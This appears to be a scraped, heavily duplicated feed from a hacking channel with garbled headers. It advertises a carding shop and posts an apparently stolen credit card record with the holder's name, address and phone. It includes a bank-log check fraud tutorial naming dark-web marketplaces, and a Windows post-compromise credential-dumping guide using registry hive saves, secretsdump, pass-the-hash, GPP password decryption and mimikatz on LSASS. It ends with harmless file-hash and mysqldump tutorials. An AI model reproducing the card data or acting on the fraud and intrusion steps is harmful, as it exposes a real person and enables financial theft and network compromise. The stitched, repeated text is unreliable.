β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Unicc shop will work under blockchain domain:
t.me/UndercodeTesting
> http://uniccshop.bazar/
You can easily get access to that when you install browser addon.
>https://blockchain-dns.info/ - download here for Firefox, Chrome
> https://peername.com/browser-extension/ - here for Opera
Or make use of https://fri-gate.org/ addon
But if you have another browser or another device (iOS, Android):
> Use https://www.opennic.org/ DNS servers, which will help you get access to our domain.
Change your internet connection DNS settings and set up one of the servers from the list: https://servers.opennic.org/
> Our extension improves and speeds up access to sites, without causing any inconvenience. With the help of the original algorithm of work, the speed of access to sites is increasing, which is very important.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Unicc shop will work under blockchain domain:
t.me/UndercodeTesting
> http://uniccshop.bazar/
You can easily get access to that when you install browser addon.
>https://blockchain-dns.info/ - download here for Firefox, Chrome
> https://peername.com/browser-extension/ - here for Opera
Or make use of https://fri-gate.org/ addon
But if you have another browser or another device (iOS, Android):
> Use https://www.opennic.org/ DNS servers, which will help you get access to our domain.
Change your internet connection DNS settings and set up one of the servers from the list: https://servers.opennic.org/
> Our extension improves and speeds up access to sites, without causing any inconvenience. With the help of the original algorithm of work, the speed of access to sites is increasing, which is very important.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CCnum:: 4246315229559099
Cvv: 180
Expm: 04
Expy: 22
Fname: Christopher
Lname: Keon
Address: 86 Trinity Circle
City: FOUR OAKS
State: NC
Zip: 27524
Country: USA
Phone: 9103669170
Cvv: 180
Expm: 04
Expy: 22
Fname: Christopher
Lname: Keon
Address: 86 Trinity Circle
City: FOUR OAKS
State: NC
Zip: 27524
Country: USA
Phone: 9103669170
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CARDING HOW TO THROW CHECK ?
fb.com/UndercodeTesting
π¦ Tools
1)Bank Log ( Wells Fargo, Chase, SunTrust, TD Bank etc )
2)RDP
4) Checkbook
3) Common Sense
π¦ Where i usually Get the tools.
1. http://slilpp.net
2. http://ordaproject.me/ (my new favorite)
3. http://pwoah7foa6au2pul.onion/search.php?s_userid=11513 safetybets on AlphaBay
Marketplace
π¦ This next one is not as popular but they have really quality accounts.
4. http://www.sanwells.ws
5. www.checkbook.io (Here is where you get the Checks From)
The Bank Log Info we need (minimum)
For this process we need the following info:
β’ Account holder name
β’ Account Balance(so we know how much to send!)
β’ Online Bank login Details.
π¦ This can be accomplished with any bank that offers online banking, but I am going to run
through the process using Wells Fargo accounts as an Example.
Monitoring account balance and transaction history
> This will teach you how to monitor account balance and transaction history without even needing
> to login on the accounts and risk getting locked out whether it's your own bank drop or a hacked
> Wells Fargo login, it doesn't matter! Once you are in possession of full account numbers and
π¦ routing and all details, then you should go to this website:
http://www.mint.com and apply with the full details to a free monitoring account Once you have
gotten the full account information create an account at mint.com and add the bank account. It's
very easy to do with the full account numbers/information you should have no problem
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CARDING HOW TO THROW CHECK ?
fb.com/UndercodeTesting
π¦ Tools
1)Bank Log ( Wells Fargo, Chase, SunTrust, TD Bank etc )
2)RDP
4) Checkbook
3) Common Sense
π¦ Where i usually Get the tools.
1. http://slilpp.net
2. http://ordaproject.me/ (my new favorite)
3. http://pwoah7foa6au2pul.onion/search.php?s_userid=11513 safetybets on AlphaBay
Marketplace
π¦ This next one is not as popular but they have really quality accounts.
4. http://www.sanwells.ws
5. www.checkbook.io (Here is where you get the Checks From)
The Bank Log Info we need (minimum)
For this process we need the following info:
β’ Account holder name
β’ Account Balance(so we know how much to send!)
β’ Online Bank login Details.
π¦ This can be accomplished with any bank that offers online banking, but I am going to run
through the process using Wells Fargo accounts as an Example.
Monitoring account balance and transaction history
> This will teach you how to monitor account balance and transaction history without even needing
> to login on the accounts and risk getting locked out whether it's your own bank drop or a hacked
> Wells Fargo login, it doesn't matter! Once you are in possession of full account numbers and
π¦ routing and all details, then you should go to this website:
http://www.mint.com and apply with the full details to a free monitoring account Once you have
gotten the full account information create an account at mint.com and add the bank account. It's
very easy to do with the full account numbers/information you should have no problem
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ DUMPING ACCOUNTS FROM WINDOWS TUTORIAL :
t.me/UndercodeTesting
1) Dumping credentials on a Windows host
Once youβve fully compromised a Windows host (by gaining SYSTEM-level privileges), your next move is to gather as many credentials as possible because they could grant you a greater level of access on the network, or the same passwords could be used elsewhere on other critical assets.
2) If the Windows host is part of an Active Directory domain, youβll be on the hunt for privileged domain accounts, and your target will be (preferably) a member of the Domain Admins group.
π¦The following techniques can be used to dump Windows credentials from an already-compromised Windows host.
3) Registry Hives
Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system:
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
Password Hashes
4) Get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with secretsdump :
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
...
Local SAM Hashes
Crack the LM hashes (if any) using Ophcrack .
Crack the NT hashes using JtR or hashcat .
Remember that if you canβt crack promising password hashes, you can just pass the hash against other accounts using the same password on other hosts or even the domain.
π¦ DUMPING ACCOUNTS FROM WINDOWS TUTORIAL :
t.me/UndercodeTesting
1) Dumping credentials on a Windows host
Once youβve fully compromised a Windows host (by gaining SYSTEM-level privileges), your next move is to gather as many credentials as possible because they could grant you a greater level of access on the network, or the same passwords could be used elsewhere on other critical assets.
2) If the Windows host is part of an Active Directory domain, youβll be on the hunt for privileged domain accounts, and your target will be (preferably) a member of the Domain Admins group.
π¦The following techniques can be used to dump Windows credentials from an already-compromised Windows host.
3) Registry Hives
Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system:
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
Password Hashes
4) Get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with secretsdump :
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
...
Local SAM Hashes
Crack the LM hashes (if any) using Ophcrack .
Crack the NT hashes using JtR or hashcat .
Remember that if you canβt crack promising password hashes, you can just pass the hash against other accounts using the same password on other hosts or even the domain.
π¦ Cached Domain Credentials
1) These are the password hashes of domain users that have logged on to the host previously.
> Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 β¦). Note that you canβt perform βpass-the-hashβ style attacks with this type of hash.
2) LSA Secrets
Here, you will find account passwords for services that are set to run under actual Windows user accounts (as opposed to Local System, Network Service and Local Service), the auto-logon password and more.
3) If the Windows host is part of a domain, you will find the domain credentials of the machine account with which you can authenticate to the domain to list domain users and admins as well as browsing shares and so on.
4) Use pth on Kali Linux or wce on your own Windows system to use these credentials.
$ pth-net rpc user -U 'securus\john-pc$%aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f' -S dc1.securus.corp.com
Administrator
hdes
...
5) Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted :
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
π¦In-Memory Credentials
Dump clear-text passwords from memory using mimikatz and the Windows Task Manager to dump the LSASS process.
1) To do this, dump the lsass.exe process to a file using Windows built-in Task Manager with right-clicking βlsass.exeβ then selecting βCreate Dump Fileβ (since Vista) or Procdump (pre Vista) β alternatively, use some powershell-fu (see carnal0wnage blog post):
C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
2) Then dump the credentials offline using mimikatz and its minidump module:
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
3) Make sure you run mimikatz on the same major version and same architecture you pulled the process dump from (refer to this ).
Alternatively, you can upload and run wce on the host, but the binary is likely to get picked up by most Anti Virus software. Also, note that wce-v1.41beta still doesnβt seem to dump the passwords of outbound SMB sessions (that can be listed with βnet useβ on the compromised Windows system), although mimikatz will.
1) These are the password hashes of domain users that have logged on to the host previously.
> Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 β¦). Note that you canβt perform βpass-the-hashβ style attacks with this type of hash.
2) LSA Secrets
Here, you will find account passwords for services that are set to run under actual Windows user accounts (as opposed to Local System, Network Service and Local Service), the auto-logon password and more.
3) If the Windows host is part of a domain, you will find the domain credentials of the machine account with which you can authenticate to the domain to list domain users and admins as well as browsing shares and so on.
4) Use pth on Kali Linux or wce on your own Windows system to use these credentials.
$ pth-net rpc user -U 'securus\john-pc$%aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f' -S dc1.securus.corp.com
Administrator
hdes
...
5) Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted :
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
π¦In-Memory Credentials
Dump clear-text passwords from memory using mimikatz and the Windows Task Manager to dump the LSASS process.
1) To do this, dump the lsass.exe process to a file using Windows built-in Task Manager with right-clicking βlsass.exeβ then selecting βCreate Dump Fileβ (since Vista) or Procdump (pre Vista) β alternatively, use some powershell-fu (see carnal0wnage blog post):
C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
2) Then dump the credentials offline using mimikatz and its minidump module:
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
3) Make sure you run mimikatz on the same major version and same architecture you pulled the process dump from (refer to this ).
Alternatively, you can upload and run wce on the host, but the binary is likely to get picked up by most Anti Virus software. Also, note that wce-v1.41beta still doesnβt seem to dump the passwords of outbound SMB sessions (that can be listed with βnet useβ on the compromised Windows system), although mimikatz will.
π¦Credential Manager :
1) When a user authenticates to a network share, a proxy, or uses a piece of client software and ticks the βRemember my passwordβ box, the password is typically stored in an encrypted vault using the Windows Data Protection API. You can see every saved credential in the Credential Manager (accessed through User Accounts in the Control Panel), and you can dump them with Network Password Recovery . Remember to run the 64-bit version on a 64-bit Windows instances, or you wonβt get them all.
2) Protected Storage
Dump any passwords remembered in IE, Outlook or MSN using Protected Storage PassView .
3) Third-party software
NirSoft offers many tools to recover passwords stored by third-party software.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
1) When a user authenticates to a network share, a proxy, or uses a piece of client software and ticks the βRemember my passwordβ box, the password is typically stored in an encrypted vault using the Windows Data Protection API. You can see every saved credential in the Credential Manager (accessed through User Accounts in the Control Panel), and you can dump them with Network Password Recovery . Remember to run the 64-bit version on a 64-bit Windows instances, or you wonβt get them all.
2) Protected Storage
Dump any passwords remembered in IE, Outlook or MSN using Protected Storage PassView .
3) Third-party software
NirSoft offers many tools to recover passwords stored by third-party software.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Check File Hash Using PowerShell :
instagram.com/UndercodeTesting
1) Handily, Windows comes with an integrated file hash checker. It is a PowerShell function, and it is easy to use. The PowerShell file hash check function supports SHA1, SHA256, SHA384, SHA512, MACTripleDES, MD5, and RIPEMD160.
2) Hereβs how you check a file hash using PowerShell.
> First, press the Windows Key, then type PowerShell. Select the best match to open PowerShell. The basic file hash check command is:
get-filehash FILEPATH
3) For example, βget-filehash c:\test.txtβ which gives you following output
π¦ Check File Hash Using PowerShell :
instagram.com/UndercodeTesting
1) Handily, Windows comes with an integrated file hash checker. It is a PowerShell function, and it is easy to use. The PowerShell file hash check function supports SHA1, SHA256, SHA384, SHA512, MACTripleDES, MD5, and RIPEMD160.
2) Hereβs how you check a file hash using PowerShell.
> First, press the Windows Key, then type PowerShell. Select the best match to open PowerShell. The basic file hash check command is:
get-filehash FILEPATH
3) For example, βget-filehash c:\test.txtβ which gives you following output
π¦ The default hash output is in SHA256. If you want a different hash value for the file, use the following command:
get-filehash -Algorithm [HASH TYPE] FILEPATH
For example, βget-filehash -Algorithm SHA384 c:\test.txtβ now gives the following output:
get-filehash -Algorithm [HASH TYPE] FILEPATH
For example, βget-filehash -Algorithm SHA384 c:\test.txtβ now gives the following output:
π¦ The time it takes to generate a hash depends on the size of the file and the algorithm you use.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ DON'T USE FOR DUMP DATA:
Using the mysqldump tool to make a backup of databases
Letβs take some examples of using the mysqldump tool to backup database examples.
1) Using the mysqldump tool to make a backup of a single database
The following command backs up a single database from a MySQL Server:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --databases <database_name>
In this syntax:
The <username> is the user account that will login to the MySQL Server.
The <password> is the password for the <username>.
The <path_to_backup_file> is the path to the backup file.
The --databases is an option that instructs the mysqldump tool to create a dump of the specified databases.
The <database_name> is the name of the database that you want to back up.
For example, the following command creates a backup of the database classicmodels to the file c:\backup\classicmodels.sql:
π¦mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels.sql --databases classicmodels
2) Using the mysqldump tool to make a backup of multiple databases
To make a backup of multiple databases, you specify a list of the database names after the --database option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --databases <dbname1>[,<dbname2>, ...]
For example, the following command makes a backup of the classicmodels and world databases:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels_world.sql --databases classicmodels world
3) Using the mysqldump tool to make a backup of all databases
To make a backup of all databases in a MySQL Server, you use the βall-database option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --all-databases
The following statement makes a backup of all databases in the current MySQL server:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\all_databases.sql --all-databases
4) Using the mysqldump tool to make a backup of specific tables from a database
π¦To make a backup of specific tables from a database, you use the following command:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> <database_name> <table_name>
You can also specify multiple tables after the database name, one after the other:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> <database_name> <table1> <table2> <table3>
For example, to make a backup of the employees table from the classicmodels database, you use the following command:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\employees.sql classicmodels employees
5) Using a mysqldump tool to make a backup of database structure only
To make a backup of the database structure only, you use the --no-data option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --no-data --databases <database_name>
The statement will generate a dump file that contains the SQL statement necessary to re-create the database structure. And the dump file does not contain INSERT statements.
π¦For example, the following statement makes a backup of the database structure of the database classicmodels:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels-ddl.sql --no-data --databases classicmodels
6) Using the mysqldump tool to make a backup of data only
To make a backup of the database data only, you use the --no-create-info option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> β-no-create-info --databases <database_name>
The statement will generate a dump file that contains the SQL statements necessary to lock tables and insert data into the tables. It has no CREATE TABLE statements.
The following command makes a backup of data of the database classicmodels:
mysqldump β-user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels-data.sql β-no-create-info --databases classicmodels
π¦ DON'T USE FOR DUMP DATA:
Using the mysqldump tool to make a backup of databases
Letβs take some examples of using the mysqldump tool to backup database examples.
1) Using the mysqldump tool to make a backup of a single database
The following command backs up a single database from a MySQL Server:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --databases <database_name>
In this syntax:
The <username> is the user account that will login to the MySQL Server.
The <password> is the password for the <username>.
The <path_to_backup_file> is the path to the backup file.
The --databases is an option that instructs the mysqldump tool to create a dump of the specified databases.
The <database_name> is the name of the database that you want to back up.
For example, the following command creates a backup of the database classicmodels to the file c:\backup\classicmodels.sql:
π¦mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels.sql --databases classicmodels
2) Using the mysqldump tool to make a backup of multiple databases
To make a backup of multiple databases, you specify a list of the database names after the --database option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --databases <dbname1>[,<dbname2>, ...]
For example, the following command makes a backup of the classicmodels and world databases:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels_world.sql --databases classicmodels world
3) Using the mysqldump tool to make a backup of all databases
To make a backup of all databases in a MySQL Server, you use the βall-database option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --all-databases
The following statement makes a backup of all databases in the current MySQL server:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\all_databases.sql --all-databases
4) Using the mysqldump tool to make a backup of specific tables from a database
π¦To make a backup of specific tables from a database, you use the following command:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> <database_name> <table_name>
You can also specify multiple tables after the database name, one after the other:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> <database_name> <table1> <table2> <table3>
For example, to make a backup of the employees table from the classicmodels database, you use the following command:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\employees.sql classicmodels employees
5) Using a mysqldump tool to make a backup of database structure only
To make a backup of the database structure only, you use the --no-data option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> --no-data --databases <database_name>
The statement will generate a dump file that contains the SQL statement necessary to re-create the database structure. And the dump file does not contain INSERT statements.
π¦For example, the following statement makes a backup of the database structure of the database classicmodels:
mysqldump --user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels-ddl.sql --no-data --databases classicmodels
6) Using the mysqldump tool to make a backup of data only
To make a backup of the database data only, you use the --no-create-info option:
mysqldump --user=<username> --password=<password> --result-file=<path_to_backup_file> β-no-create-info --databases <database_name>
The statement will generate a dump file that contains the SQL statements necessary to lock tables and insert data into the tables. It has no CREATE TABLE statements.
The following command makes a backup of data of the database classicmodels:
mysqldump β-user=root --password=Supe!rPass1 --result-file=c:\backup\classicmodels-data.sql β-no-create-info --databases classicmodels